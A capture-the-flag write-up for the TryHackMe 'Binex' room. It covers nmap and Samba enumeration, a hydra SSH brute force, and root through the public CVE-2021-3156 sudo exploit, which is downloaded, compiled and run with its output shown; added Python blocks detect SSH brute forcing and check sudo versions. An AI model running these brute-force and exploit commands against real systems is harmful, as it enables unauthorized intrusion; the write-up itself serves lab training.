Binex Writeup CVE-2021-3156

Escalate your privileges by exploiting vulnerable binaries.

TryHackMe Binex created by DesKel

Enumerate the machine and get an interactive shell. Exploit an SUID bit file, use GNU debugger to take advantage of a buffer overflow and gain root access by PATH manipulation.

There are more points up for grabs in this room.

What are the login credentials for initial access?

The answer format is username:password

Hint 1: RID range 1000-1003
Hint 2: The longest username has the insecure password.

Step one, enumerate open ports and services running.

sudo nmap -sS -sV -T4 --open -Pn -p- 10.10.17.162

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 15:15 EST
Nmap scan report for 10.10.17.162
Host is up (0.15s latency).
Not shown: 65505 closed ports, 27 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: THM_EXPLOIT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.73 seconds

NetBIOS/Samba running on ports 139 and 445. Enumerate the users and shared folders.

enum4linux 10.10.17.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 13 15:10:40 2021
[...]
 ======================================================================= 
|    Users on 10.10.17.162 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2007993849-1719925537-2372789573
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kel (Local User)
S-1-22-1-1001 Unix User\des (Local User)
S-1-22-1-1002 Unix User\tryhackme (Local User)
S-1-22-1-1003 Unix User\noentry (Local User)
[+] Enumerating users using SID S-1-5-21-2007993849-1719925537-2372789573 and logon username '', password ''
S-1-5-21-2007993849-1719925537-2372789573-500 *unknown*\*unknown* (8)
S-1-5-21-2007993849-1719925537-2372789573-501 THM_EXPLOIT\nobody (Local User)
[...]
S-1-5-21-2007993849-1719925537-2372789573-513 THM_EXPLOIT\None (Domain Group)
[...]
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[...]
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[...]

 ============================================= 
|    Getting printer info for 10.10.17.162    |
 ============================================= 
No printers returned.

enum4linux complete on Sat Mar 13 15:20:47 2021

Use hydra to brute-force the SSH service and recover the tryhackme password.

hydra -l tryhackme -P /usr/share/wordlists/rockyou.txt 10.10.17.162 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 15:38:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.17.162:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 14344223 to do in 1335:36h, 16 active
[STATUS] 113.00 tries/min, 339 tries in 00:03h, 14344063 to do in 2115:39h, 16 active
[STATUS] 117.00 tries/min, 819 tries in 00:07h, 14343583 to do in 2043:15h, 16 active
[22][ssh] host: 10.10.17.162   login: tryhackme   password: PASSWORD_TEXT
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 15:46:03
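The hydra run above shows what this looks like from the attacker's side: roughly 179 password attempts per minute against one account. From the defender's side the same activity is trivial to spot in sshd's log. The script below is an added example written for this writeup, not part of the room or of any tool mentioned here: it parses auth.log style "Failed/Accepted password" lines, flags a source IP once it reaches a failure threshold inside a sliding window, and flags a later successful login from a flagged source (the pattern the run above ends with). The log lines are constructed to resemble the attempt rate above; the hostname, PIDs, ports and the 10.10.10.50 address are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One sshd auth.log line per password attempt, e.g.
# "Mar 13 15:38:31 thm_exploit sshd[2041]: Failed password for tryhackme from 10.6.60.115 port 40200 ssh2"
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_sshd_line(line, year=2021):
    """Return (timestamp, result, user, src) or None; syslog lines carry no year, so one is assumed."""
    m = SSHD_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_ssh_bruteforce(lines, threshold=10, window_seconds=60):
    """Flag a source IP once it reaches `threshold` failed logins inside a sliding window,
    and flag any later successful login from a source that was already flagged."""
    events = sorted(filter(None, map(parse_sshd_line, lines)), key=lambda e: e[0])
    recent_failures = defaultdict(deque)   # src -> failure timestamps still inside the window
    flagged = set()
    alerts = []
    for ts, result, user, src in events:
        window = recent_failures[src]
        if result == "Failed":
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"src": src, "kind": "bruteforce", "user": user, "at": ts})
        elif src in flagged:
            alerts.append({"src": src, "kind": "success_after_bruteforce", "user": user, "at": ts})
    return alerts


def constructed_sample_log():
    """Constructed auth.log lines modelled on the hydra run (not captured from the machine):
    12 failures three seconds apart from one source, an unrelated single failure, then a success."""
    base = datetime(2021, 3, 13, 15, 38, 31)
    lines = [
        f"{(base + timedelta(seconds=3 * i)).strftime('%b %d %H:%M:%S')} thm_exploit sshd[2041]: "
        f"Failed password for tryhackme from 10.6.60.115 port {40200 + i} ssh2"
        for i in range(12)
    ]
    lines.append("Mar 13 15:40:10 thm_exploit sshd[2077]: Failed password for des from 10.10.10.50 port 50111 ssh2")
    lines.append("Mar 13 15:46:02 thm_exploit sshd[2190]: Accepted password for tryhackme from 10.6.60.115 port 40360 ssh2")
    return lines


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(constructed_sample_log()):
        print(f"{alert['at']:%H:%M:%S}  {alert['src']:15}  {alert['kind']}  (user {alert['user']})")
```

The threshold and window are deliberately loose (10 failures in 60 seconds); hydra's default 16 parallel tasks trip it within the first minute, while a user mistyping a password a few times does not. The "success_after_bruteforce" alert is the one worth paging on, since it means the guessed credential worked.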

The easy way

In January 2021, the Qualys research team disclosed a heap overflow vulnerability in sudo, CVE-2021-3156, that allows any unprivileged local user to gain root privileges on Linux without needing a password. The vulnerability, introduced in 2011, was fixed in sudo 1.9.5p2, released on January 26, 2021.

CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)

If you are playing an old CTF room, it is quite possible that the machine is vulnerable to CVE-2021-3156.

This is not a new room, so let's test for Baron Samedit. The test is simple and tells us whether the machine is vulnerable.

sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): memory corruption
Aborted (core dumped)

It is vulnerable.
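For checking more than one host it helps to script the decision. The following Python is an added example, not part of the writeup and not code from sudo, Qualys or the exploit repository: it parses `sudo --version` output against the affected ranges Qualys published (1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1) and interprets the stderr of the `sudoedit -s '\' ...` probe above, where an error starting with `malloc()` means vulnerable and a `usage:` error means the fix is present. All version strings fed to it here are constructed.

```python
import re
from typing import Optional, Tuple

# Affected upstream version ranges from the Qualys advisory for CVE-2021-3156:
# legacy 1.8.2 .. 1.8.31p2 and stable 1.9.0 .. 1.9.5p1 (fixed in 1.9.5p2).
# Versions are compared as (major, minor, patch, patchlevel) tuples.
VULNERABLE_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

# First line of `sudo --version` looks like "Sudo version 1.8.21p2".
VERSION_RE = re.compile(r"Sudo version\s+(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(output: str) -> Optional[Tuple[int, int, int, int]]:
    """Extract the upstream sudo version; a missing 'pN' suffix means patchlevel 0."""
    m = VERSION_RE.search(output)
    if m is None:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def assess_sudo_version(output: str) -> str:
    """'vulnerable', 'not_affected' or 'unknown', judged from the upstream version string only."""
    version = parse_sudo_version(output)
    if version is None:
        return "unknown"
    if any(low <= version <= high for low, high in VULNERABLE_RANGES):
        return "vulnerable"
    return "not_affected"


def classify_sudoedit_probe(stderr: str) -> str:
    """Interpret the stderr of:  sudoedit -s '\\' $(python3 -c 'print("A"*1000)')

    A vulnerable sudo crashes in the heap allocator (first line starts with 'malloc()');
    a fixed sudo rejects the argument with a 'usage:' error instead.
    """
    first = stderr.strip().splitlines()[0] if stderr.strip() else ""
    if first.startswith("malloc()"):
        return "vulnerable"
    if first.startswith("usage:"):
        return "not_affected"
    return "unknown"


if __name__ == "__main__":
    # Constructed sample inputs (not captured from the room machine).
    samples = [
        "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2",
        "Sudo version 1.8.31p2",
        "Sudo version 1.9.5p2",
    ]
    for text in samples:
        print(f"{text.splitlines()[0]:30} -> {assess_sudo_version(text)}")
    print("probe:", classify_sudoedit_probe("malloc(): memory corruption\nAborted (core dumped)"))
```

One caveat: distributions that backport fixes keep the upstream version string, so a patched Ubuntu 18.04 sudo still reports 1.8.21p2 and the version check alone over-reports. The behavioural probe used in the writeup (or the distribution's package changelog) is the authoritative answer; the version check is only a cheap first pass.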

There is a ready-made exploit on GitHub; all we have to do is download it and use it.

https://github.com/blasty/CVE-2021-3156

From your local machine, download the exploit code and compile it with make.

wget https://github.com/blasty/CVE-2021-3156/archive/main.zip
--2021-03-13 15:57:52--  https://github.com/blasty/CVE-2021-3156/archive/main.zip
Resolving github.com (github.com)... 140.82.114.3
Connecting to github.com (github.com)|140.82.114.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [following]
--2021-03-13 15:57:52--  https://codeload.github.com/blasty/CVE-2021-3156/zip/main
Resolving codeload.github.com (codeload.github.com)... 140.82.114.9
Connecting to codeload.github.com (codeload.github.com)|140.82.114.9|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’

main.zip                                [ <=>                                                              ]   4.22K  --.-KB/s    in 0s      

2021-03-13 15:57:52 (8.88 MB/s) - ‘main.zip’ saved [4321]

unzip main.zip 
Archive:  main.zip
da68f7c1a2961595a3226b903f1fc180b8824255
   creating: CVE-2021-3156-main/
  inflating: CVE-2021-3156-main/Makefile  
  inflating: CVE-2021-3156-main/README.md  
  inflating: CVE-2021-3156-main/brute.sh  
  inflating: CVE-2021-3156-main/hax.c  
  inflating: CVE-2021-3156-main/lib.c  

cd CVE-2021-3156-main/

make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

Start a local web server with python3

python3 -m http.server

From the room machine, download the binaries, set the executable flag and run the exploit. Check the distribution release first so you can pick the matching target.

cat /etc/*release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

chmod +x -R *

./sudo-hax-me-a-sandwich 

** CVE-2021-3156 PoC by blasty <[email protected]>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty <[email protected]>

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1002(tryhackme)

Done, you are root. Now just collect the flags and finish the room.

/bin/bash

# ls /root
root.txt
# cat /root/root.txt
The flag: ROOT_FLAG.
Also, thank you for your participation.

The room is built with love. DesKel out.
ls /home/des/      
bof  bof64.c  flag.txt

# cat /home/des/flag.txt 
Good job on exploiting the SUID file. Never assign +s to any system executable files. Remember, Check gtfobins.

You flag is DES_FLAG

login crdential (In case you need it)
username: des
password: DES_PASSWORD
ls /home/kel/          
exe  exe.c  flag.txt
root@thm_exploit:/tmp/10.6.60.115:8000# cat /home/kel/flag.txt 
You flag is KEL_FLAG

The user credential
username: kel
password: KEL_PASSWORD

So guys and girls, this is done. It was fast, but not beautiful; later I will try to finish this room in the right manner.

It is also important to realise that any host that has not been updated can be vulnerable to this exploit, and a simple test followed by an update can prevent further damage.